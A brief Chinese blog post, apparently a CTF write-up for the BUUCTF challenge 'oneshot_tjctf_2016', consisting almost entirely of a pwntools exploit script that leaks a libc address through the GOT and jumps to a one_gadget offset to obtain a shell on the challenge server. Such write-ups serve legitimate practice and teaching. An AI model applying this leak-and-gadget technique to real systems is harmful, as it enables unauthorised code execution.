[CTF buu]

oneshot_tjctf_2016

Posted by Mr.Be1ieVe on Wednesday, February 5, 2020

image-20200205020208419

image-20200205020146218

*v4,要用str(elf.got['__libc_start_main'])

接受要用int(sh.recvuntil("\n",True),16)

exp

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./oneshot_tjctf_2016')
lib = 0
sh = 0
def pwn(ip,port,debug):
    global lib
    global sh
    if debug == 1:
        sh = process('./oneshot_tjctf_2016')
        lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        sh = remote(ip,port)
        lib = ELF('/home/mrbelieve/Desktop/PWN/buu/libc/64-libc-2.23.so')
    payload = str(elf.got['__libc_start_main'])
    pause()
    sh.sendline(payload)
    sh.recvuntil("0x0000")
    __libc_start_main = int(sh.recvuntil("\n",True),16)
    libc = __libc_start_main - lib.symbols['__libc_start_main']
    one_gadget = 0xf1147 
    payload = str( libc  + one_gadget)
    sh.sendline(payload)

    sh.interactive()
if __name__ ==  "__main__":
    pwn("node3.buuoj.cn",29303,0)

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付

CATALOG
    FEATURED TAGS
    awd buu ctf hackthebox linux使用 xray 专业学习 基础知识 学习笔记